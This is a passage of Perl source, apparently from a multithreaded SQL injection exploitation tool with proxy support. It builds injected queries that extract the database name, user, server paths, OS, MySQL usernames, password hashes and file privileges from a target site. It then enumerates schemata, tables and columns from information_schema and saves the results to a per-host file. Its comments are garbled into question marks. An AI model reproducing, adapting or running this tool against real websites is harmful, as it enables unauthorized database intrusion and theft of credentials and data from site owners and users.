  3632.      $nc_midle1 = "";
  3633.      #### ?????? ??? ???? #####################################################
  3634.      $temp = $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2;
  3635.      $nc_start1 = $nc_start . $temp;
  3636.      $nc_midle1 = $nc_midle . $temp;
  3637.      $url2 = $nc_start1 . $nc_midle1 . $nc_end;
  3638.      $nc_start1 = "";
  3639.      $nc_midle1 = "";
  3640.      #### ?????? ????? #####################################################
  3641.      $temp = $sql_pref1 . "concat(0x757365723a,user())" . $sql_pref2;
  3642.      $nc_start1 = $nc_start . $temp;
  3643.      $nc_midle1 = $nc_midle . $temp;
  3644.      $url3 = $nc_start1 . $nc_midle1 . $nc_end;
  3645.      $nc_start1 = "";
  3646.      $nc_midle1 = "";
  3647.      #### ?????? @@basedir #####################################################
  3648.      $temp = $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2;
  3649.      $nc_start1 = $nc_start . $temp;
  3650.      $nc_midle1 = $nc_midle . $temp;
  3651.      $url4 = $nc_start1 . $nc_midle1 . $nc_end;
  3652.      $nc_start1 = "";
  3653.      $nc_midle1 = "";
  3654.      #### ?????? @@datadir #####################################################
  3655.      $temp = $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2;
  3656.      $nc_start1 = $nc_start . $temp;
  3657.      $nc_midle1 = $nc_midle . $temp;
  3658.      $url5 = $nc_start1 . $nc_midle1 . $nc_end;
  3659.      $nc_start1 = "";
  3660.      $nc_midle1 = "";
  3661.      #### ?????? @@tmpdir #####################################################
  3662.      $temp = $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2;
  3663.      $nc_start1 = $nc_start . $temp;
  3664.      $nc_midle1 = $nc_midle . $temp;
  3665.      $url6 = $nc_start1 . $nc_midle1 . $nc_end;
  3666.      $nc_start1 = "";
  3667.      $nc_midle1 = "";
  3668.      #### ?????? @@version_compile_os #####################################################
  3669.      $temp = $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2;
  3670.      $nc_start1 = $nc_start . $temp;
  3671.      $nc_midle1 = $nc_midle . $temp;
  3672.      $url7 = $nc_start1 . $nc_midle1 . $nc_end;
  3673.      $nc_start1 = "";
  3674.      $nc_midle1 = "";
  3675.      #### ?????? mysql.user #####################################################
  3676.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user)";
  3677.      $nc_start1 = $nc_start . $temp;
  3678.      $nc_midle1 = $nc_midle . $temp;
  3679.      $url8 = $nc_start1 . $nc_midle1 . $nc_end;
  3680.      $nc_start1 = "";
  3681.      $nc_midle1 = "";
  3682.      #### ?????? mysql.password #####################################################
  3683.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user)";
  3684.      $nc_start1 = $nc_start . $temp;
  3685.      $nc_midle1 = $nc_midle . $temp;
  3686.      $url9 = $nc_start1 . $nc_midle1 . $nc_end;
  3687.      $nc_start1 = "";
  3688.      $nc_midle1 = "";
  3689.      #### ?????? file_priv #####################################################
  3690.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user" . $nc_plus . "where" . $nc_plus . "user=user)";
  3691.      $nc_start1 = $nc_start . $temp;
  3692.      $nc_midle1 = $nc_midle . $temp;
  3693.      $url10 = $nc_start1 . $nc_midle1 . $nc_end;
  3694.      $nc_start1 = "";
  3695.      $nc_midle1 = "";
  3696.      #####################################################################
  3697.      $thr = $kol_threads; # ???-?? ???????
  3698.      $num = -1; # ?? ????????
  3699.      print "-----------------------------------------\n";
  3700.      print "System information:\n";
  3701.      print "-----------------------------------------\n";
  3702.      print FILE  "-----------------------------------------\n";
  3703.      print FILE  "SQL: $url1\n";
  3704.      print FILE "-----------------------------------------\n";
  3705.      print FILE "System information:\n";
  3706.      print FILE "-----------------------------------------\n";
  3707.      print "Request method - $method\n";
  3708.      print "Threads - $kol_threads\n";
  3709.      print "Proxy - $proxy_message\n";
  3710.      print "----------------------\n";
  3711.      for(0..$thr) {
  3712.         $trl[$_] = threads->create(\&gets111);
  3713.      }
  3714.      for(0..$thr) {
  3715.         $trl[$_]->join;
  3716.      }
  3717.      sub gets111 {
  3718.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
  3719.         $size = @array; #???????? ?????? ???????
  3720.         $| = 1;
  3721.         while ($num<$size) {
  3722.             { lock($num);
  3723.             $num++; }
  3724.             $current = $array[$num];
  3725.             $content = scan_url();
  3726.             if ($content =~ m/ussr(.*?)ussr/img) {
  3727.                   print $1 . "\n";
  3728.                   print FILE $1 . "\n";
  3729.             }
  3730.             print $num . "\r";
  3731.             sleep $pause;
  3732.         }
  3733.      }
  3734.      print "----------\n";
  3735.      print "Saved in " . "z_" . $host . ".txt\n";
  3736.      close(FILE);
  3737.      goto START200;
  3738. }#end 1
  3739. # DB from schemata
  3740. if ($choice == 2) {
  3741.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  3742.      ## ???-?? ?? ? information_schema.schemata ##
  3743.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.schemata" . $nc_plus . "limit" . $nc_plus . "0,1)";
  3744.      $nc_start1 = $nc_start . $temp;
  3745.      $nc_midle1 = $nc_midle . $temp;
  3746.      $current = $nc_start1 . $nc_midle1 . $nc_end;
  3747.      $content = scan_url();
  3748.      $bd_num = $content;
  3749.      $bd_num =~ m/ussr(.*?)ussr/img;
  3750.      $bd_num = $1-1;
  3751.      print FILE "-----------------------------------------\n";
  3752.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
  3753.      print FILE "-----------------------------------------\n";
  3754.      print "-----------------------------------------\n";
  3755.      print "Data bases in information_schema.schemata - $1\n";
  3756.      print "-----------------------------------------\n";
  3757.      $num = -1; # ?? ????????
  3758.      $thr = $kol_threads; # ???-?? ???????
  3759.      print "Request method - $method\n";
  3760.      print "Threads - $kol_threads\n";
  3761.      print "Proxy - $proxy_message\n";
  3762.      print "----------------------\n";
  3763.      for(0..$thr) {
  3764.          $trl[$_] = threads->create(\&gets5050111);
  3765.      }
  3766.      for(0..$thr) {
  3767.          $trl[$_]->join;
  3768.      }
  3769.      sub gets5050111 {
  3770.        $| = 1;
  3771.        while ($num<$bd_num) {
  3772.          { lock($num);
  3773.          $num++; }
  3774.          $temp = "(select" . $nc_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.schemata" . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3775.          $nc_start1 = $nc_start . $temp;
  3776.          $nc_midle1 = $nc_midle . $temp;
  3777.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  3778.          $content = scan_url();
  3779.          if ($content =~ m/ussr(.*?)ussr/img) {
  3780.                   print $1 . "\n";
  3781.                   print FILE $1 . "\n";
  3782.          }
  3783.          print $num . "\r";
  3784.          sleep $pause;
  3785.  
  3786.        }
  3787.      }
  3788.     print "----------\n";
  3789.     print "Saved in " . "z_" . $host . ".txt\n";
  3790.     close(FILE);
  3791.     goto START200;
  3792. } # end DB
  3793. # tables from DB from schemata
  3794. if ($choice == 3) {
  3795.      sub ascii_to_hex ($) {
  3796.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3797.             $str = "0x" . $str;
  3798.             return $str;
  3799.      }
  3800.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  3801.      print "-----------------------------------------\n";
  3802.      print "Enter the DB-name: ";
  3803.      $choice = <STDIN>;
  3804.      chomp $choice;
  3805.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  3806.      print "DB-name: $choice\n";
  3807.      print "----------\n";
  3808.      $choice1 = ascii_to_hex $choice;
  3809.      ## ???-?? tables ? information_schema.schemata ##
  3810.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables"  . $nc_plus . "where" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  3811.      $nc_start1 = $nc_start . $temp;
  3812.      $nc_midle1 = $nc_midle . $temp;
  3813.      $current = $nc_start1 . $nc_midle1 . $nc_end;
  3814.      $content = scan_url();
  3815.      $bd_num = $content;
  3816.      $bd_num =~ m/ussr(.*?)ussr/img;
  3817.      $bd_num = $1;
  3818.      print FILE "-----------------------------------------\n";
  3819.      print FILE "Tables in $choice: $bd_num\n";
  3820.      print FILE "-----------------------------------------\n";
  3821.      print "-----------------------------------------\n";
  3822.      print "Tables in $choice: $bd_num\n";
  3823.      print "-----------------------------------------\n";
  3824.      $num = -1; # ?? ????????
  3825.      $thr = $kol_threads; # ???-?? ???????
  3826.      print "Request method - $method\n";
  3827.      print "Threads - $kol_threads\n";
  3828.      print "Proxy - $proxy_message\n";
  3829.      print "----------------------\n";
  3830.      for(0..$thr) {
  3831.          $trl[$_] = threads->create(\&gets5050222);
  3832.      }
  3833.      for(0..$thr) {
  3834.          $trl[$_]->join;
  3835.      }
  3836.      sub gets5050222 {
  3837.        $| = 1;
  3838.        while ($num<$bd_num) {
  3839.          { lock($num);
  3840.          $num++; }
  3841.          $temp = "(select" . $nc_plus . $sql_pref1 . "table_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables"  . $nc_plus . "where" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3842.           $nc_start1 = $nc_start . $temp;
  3843.          $nc_midle1 = $nc_midle . $temp;
  3844.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  3845.          $content = scan_url();
  3846.          if ($content =~ m/ussr(.*?)ussr/img) {
  3847.                   print $1 . "\n";
  3848.                   print FILE $1 . "\n";
  3849.          }
  3850.          print $num . "\r";
  3851.          sleep $pause;
  3852.  
  3853.        }
  3854.      }
  3855.     print "----------\n";
  3856.     print "Saved in " . "z_" . $host . ".txt\n";
  3857.     close(FILE);
  3858.     goto START200;
  3859. } # end tables from DB
  3860. # columns tables from tables from DB
  3861. if ($choice == 4) {
  3862.      sub ascii_to_hex ($) {
  3863.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3864.             $str = "0x" . $str;
  3865.             return $str;
  3866.      }
  3867.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  3868.      print "-----------------------------------------\n";
  3869.      print "Enter the DB-name: ";
  3870.      $choice = <STDIN>;
  3871.      chomp $choice;
  3872.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  3873.      $choice1 = ascii_to_hex $choice;
  3874.      print "DB-name: $choice\n";
  3875.      print "----------\n";
  3876.      $choice1 = ascii_to_hex $choice;
  3877.      print "-----------------------------------------\n";
  3878.      print "Enter the TABLE-name: ";
  3879.      $choice2 = <STDIN>;
  3880.      chomp $choice2;
  3881.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
  3882.        $choice3 = ascii_to_hex $choice2;
  3883.      print "TABLE-name: $choice2\n";
  3884.      print "----------\n";
  3885.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns"  . $nc_plus  . "where" . $nc_plus . "table_name=" . $choice3 . $nc_plus . "and" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  3886.      $nc_start1 = $nc_start . $temp;
  3887.      $nc_midle1 = $nc_midle . $temp;
  3888.      $current = $nc_start1 . $nc_midle1 . $nc_end;
  3889.        $content = scan_url();
  3890.      $bd_num = $content;
  3891.      $bd_num =~ m/ussr(.*?)ussr/img;
  3892.      $bd_num = $1;
  3893.      print FILE "-----------------------------------------\n";
  3894.      print FILE "Columns in [$choice.$choice2]: $bd_num\n";
  3895.      print FILE "-----------------------------------------\n";
  3896.      print "-----------------------------------------\n";
  3897.      print "Columns in [$choice.$choice2]: $bd_num\n";
  3898.      print "-----------------------------------------\n";
  3899.      $num = -1; # ?? ????????
  3900.      $thr = $kol_threads; # ???-?? ???????
  3901.      print "Request method - $method\n";
  3902.      print "Threads - $kol_threads\n";
  3903.      print "Proxy - $proxy_message\n";
  3904.      print "----------------------\n";
  3905.      for(0..$thr) {
  3906.          $trl[$_] = threads->create(\&gets5050333);
  3907.      }
  3908.      for(0..$thr) {
  3909.          $trl[$_]->join;
  3910.      }
  3911.      sub gets5050333 {
  3912.        $| = 1;
  3913.        while ($num<$bd_num) {
  3914.          { lock($num);
  3915.          $num++; }
  3916.          $temp = "(select" . $nc_plus . $sql_pref1 . "column_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns"  . $nc_plus  . "where" . $nc_plus . "table_name=" . $choice3 . $nc_plus . "and" . $nc_plus . "table_schema=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3917.           $nc_start1 = $nc_start . $temp;
  3918.          $nc_midle1 = $nc_midle . $temp;
  3919.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  3920.          $content = scan_url();
  3921.          if ($content =~ m/ussr(.*?)ussr/img) {
  3922.                   print $1 . "\n";
  3923.                   print FILE $1 . "\n";
  3924.          }
  3925.          print $num . "\r";
  3926.          sleep $pause;
  3927.  
  3928.        }
  3929.      }
  3930.     print "----------\n";
  3931.     print "Saved in " . "z_" . $host . ".txt\n";
  3932.     close(FILE);
  3933.     goto START200;
  3934. } # end columns tables from tables from DB
  3935. if ($choice==5) {
  3936.      sub ascii_to_hex ($) {
  3937.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3938.             $str = "0x" . $str;
  3939.             return $str;
  3940.      }
  3941.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  3942.      ## ???-?? ?????? ? information_schema.tables ##
  3943.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "limit" . $nc_plus . "0,1)";
  3944.      $nc_start1 = $nc_start . $temp;
  3945.      $nc_midle1 = $nc_midle . $temp;
  3946.      $url11 = $nc_start1 . $nc_midle1 . $nc_end;
  3947.      $current = $url11;
  3948.      $content = scan_url();
  3949.      $tab_num = $content;
  3950.      $tab_num =~ m/ussr(.*?)ussr/img;
  3951.      $tab_num = $1-1; # ???-?? ???????? ? informaion_schema
  3952.      print "-----------------------------------------\n";
  3953.      print "Tables in information_schema.tables - $1\n";
  3954.      print "-----------------------------------------\n";
  3955.      ## start from2 ##
  3956.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
  3957.      $choice = <STDIN>;
  3958.      chomp $choice;
  3959.      $thr = $kol_threads; # ???-?? ???????
  3960.      if ($choice == 1) {
  3961.           $num = -1; # ?? ????????
  3962.      } else {
  3963.           print "Enter START_position: ";
  3964.           $choice1 = <STDIN>;
  3965.           chomp $choice1;
  3966.           $num = $choice1-2;
  3967.           print "Enter END_position: ";
  3968.           $choice2 = <STDIN>;
  3969.           chomp $choice2;
  3970.           $tab_num = $choice2-1;
  3971.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
  3972.      }
  3973.      print "-----------------------------------------\n";
  3974.      ## end from2
  3975.      print FILE  "-----------------------------------------\n";
  3976.      print FILE  "Tables in information_schema.tables - $1\n";
  3977.      print FILE  "-----------------------------------------\n";
  3978.      print "Request method - $method\n";
  3979.      print "Threads - $kol_threads\n";
  3980.      print "Proxy - $proxy_message\n";
  3981.      print "----------------------\n";
  3982.      for(0..$thr) {
  3983.          $trl[$_] = threads->create(\&gets112);
  3984.      }
  3985.      for(0..$thr) {
  3986.          $trl[$_]->join;
  3987.      }
  3988.      sub gets112 {
  3989.        $| = 1;
  3990.        while ($num<$tab_num) {
  3991.          { lock($num);
  3992.          $num++; }
  3993.          $temp = "(select" . $nc_plus . $sql_pref1 . "table_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "limit" . $nc_plus . $num . ",1)";
  3994.          $nc_start1 = $nc_start . $temp;
  3995.          $nc_midle1 = $nc_midle . $temp;
  3996.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  3997.          $content = scan_url();
  3998.          if ($content =~ m/ussr(.*?)ussr/img) {
  3999.                   print $1 . "\n";
  4000.                   print FILE $1 . "\n";
  4001.          }
  4002.          print $num . "\r";
  4003.          sleep $pause;
  4004.  
  4005.        }
  4006.      }
  4007.     print "----------\n";
  4008.     print "Saved in " . "z_" . $host . ".txt\n";
  4009.     close(FILE);
  4010.     goto START200;
  4011. }#end 2
  4012. if ($choice==6) {
  4013.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  4014.     print "-----------------------------------------\n";
  4015.     print "Enter the table_name: ";
  4016.     $choice = <STDIN>;
  4017.     chomp $choice;
  4018.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  4019.     print "Table: $choice\n";
  4020.     print "----------\n";
  4021.     print FILE  "-----------------------------------------\n";
  4022.     print FILE  "Table [ $choice ]\n";
  4023.     print FILE  "-----------------------------------------\n";
  4024.     $choice1 = ascii_to_hex $choice;
  4025.     $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  4026.     $nc_start1 = $nc_start . $temp;
  4027.     $nc_midle1 = $nc_midle . $temp;
  4028.     $current = $nc_start1 . $nc_midle1 . $nc_end;
  4029.     $content = scan_url();
  4030.     $prefix = $content;
  4031.     $prefix =~ m/ussr(.*?)ussr/img;
  4032.     $prefix = $1; # ??, ? ??????? ???????
  4033.     if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  4034.     print "Database for $choice: $prefix\n";
  4035.     print FILE  "Database for $choice: $prefix\n";
  4036.     $temp = "select" . $nc_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1;
  4037.     $nc_start1 = $nc_start . $temp;
  4038.     $nc_midle1 = $nc_midle . $temp;
  4039.     $current = $nc_start1 . $nc_midle1 . $nc_end;
  4040.     $content = scan_url();
  4041.     $colum_number = $content;
  4042.     $colum_number =~ m/ussr(.*?)ussr/img;
  4043.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
  4044.     $full_table_name = $prefix . "." . $choice;
  4045.     print "Number of columns in " . $full_table_name . ": $colum_number\n";
  4046.     print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
  4047.     print "----------\n";
  4048.     ## ?????? ??????? ##
  4049.     $thr = $kol_threads; # ???-?? ???????
  4050.     $num = -1; # ?? ????????
  4051.     print "Request method - $method\n";
  4052.     print "Threads - $kol_threads\n";
  4053.     print "Proxy - $proxy_message\n";
  4054.     print "----------------------\n";
  4055.     print FILE  "Columns in " . $full_table_name . "\n";
  4056.     for(0..$thr) {
  4057.          $trl[$_] = threads->create(\&gets113);
  4058.     }
  4059.     for(0..$thr) {
  4060.          $trl[$_]->join;
  4061.     }
  4062.     sub gets113 {
  4063.        $| = 1;
  4064.        while ($num<$colum_number) {
  4065.          { lock($num);
  4066.          $num++; }
  4067.          $temp = "(select" . $nc_plus . $sql_pref1 . "column_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.columns" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . $num . ",1)" ;
  4068.          $nc_start1 = $nc_start . $temp;
  4069.          $nc_midle1 = $nc_midle . $temp;
  4070.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  4071.          $content = scan_url();
  4072.          if ($content =~ m/ussr(.*?)ussr/img) {
  4073.                   print "   " . $1 . "\n";
  4074.                   print FILE "  "  . $1 . "\n";
  4075.          }
  4076.          print $num . "\r";
  4077.          sleep $pause;
  4078.  
  4079.        }
  4080.     }
  4081.     print FILE "----------\n";
  4082.     print "----------\n";
  4083.     print "Saved in " . "z_" . $host . ".txt\n";
  4084.     close(FILE);
  4085.     goto START200;
  4086. }# end 3
  4087. if ($choice==7) {
  4088.     sub ascii_to_hex ($) {
  4089.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  4090.                $str = "0x" . $str;
  4091.              return $str;
  4092.     }
  4093.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  4094.     if ($full_table_name) {
  4095.        print "-----------------------------------------\n";
  4096.        print "Use last parsed table: $full_table_name ? (1/0): ";
  4097.        $choice = <STDIN>;
  4098.        chomp $choice;
  4099.        if ($choice==1) {
  4100.              $table_name = $full_table_name;
  4101.              print "Table: $table_name\n";
  4102.              print "----------\n";
  4103.        } else {
  4104.              print "-----------------------------------------\n";
  4105.              print "Enter the table_name: ";
  4106.              $choice = <STDIN>;
  4107.              chomp $choice;
  4108.              if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  4109.              $table_name = $choice;
  4110.              print "-----------------------------------------\n";
  4111.              print "MySQL>=5 or MySql<5? (1/0): ";
  4112.              $choice = <STDIN>;
  4113.              chomp $choice;
  4114.              if ($choice == 1) {
  4115.                   $choice1 = ascii_to_hex $table_name;
  4116.                   $temp = "(select" . $nc_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.tables" . $nc_plus . "where" . $nc_plus . "table_name=" . $choice1 . $nc_plus . "limit" . $nc_plus . "0,1)";
  4117.                   $nc_start1 = $nc_start . $temp;
  4118.                   $nc_midle1 = $nc_midle . $temp;
  4119.                   $current = $nc_start1 . $nc_midle1 . $nc_end;
  4120.                   $content = scan_url();
  4121.                   $prefix = $content;
  4122.                   $prefix =~ m/ussr(.*?)ussr/img;
  4123.                   $prefix = $1; # ??, ? ??????? ???????
  4124.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  4125.                   $table_name = $prefix . "." . $table_name;
  4126.              }
  4127.              print "Table: $table_name\n";
  4128.              print "----------\n";
  4129.        }
  4130.     } else {
  4131.        print